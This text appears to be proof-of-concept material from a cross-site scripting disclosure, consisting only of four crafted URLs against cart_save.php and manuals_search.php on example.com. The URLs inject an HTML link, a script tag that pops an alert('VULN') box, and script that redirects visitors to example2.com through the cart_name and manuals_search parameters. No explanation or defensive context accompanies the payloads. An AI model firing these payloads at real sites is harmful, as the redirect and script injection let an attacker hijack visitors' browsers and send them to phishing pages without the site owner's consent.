http://www.example.com/cart_save.php?operation=save&rnd=&rp=products.php&cart_name=<html><a href="http://www.example2.com">example</a></html>
http://www.example.com/cart_save.php?operation=save&rnd=&rp=products.php&cart_name=<html><script>alert("VULN");</script></html>
http://www.example.com/cart_save.php?operation=save&rnd=&rp=products.php&cart_name=<html><script>window.location="http://www.example2.com";</script></html>
http://www.example.com/manuals_search.php?manuals_search=<html><script>window.location="http://www.example2.com";</script></html>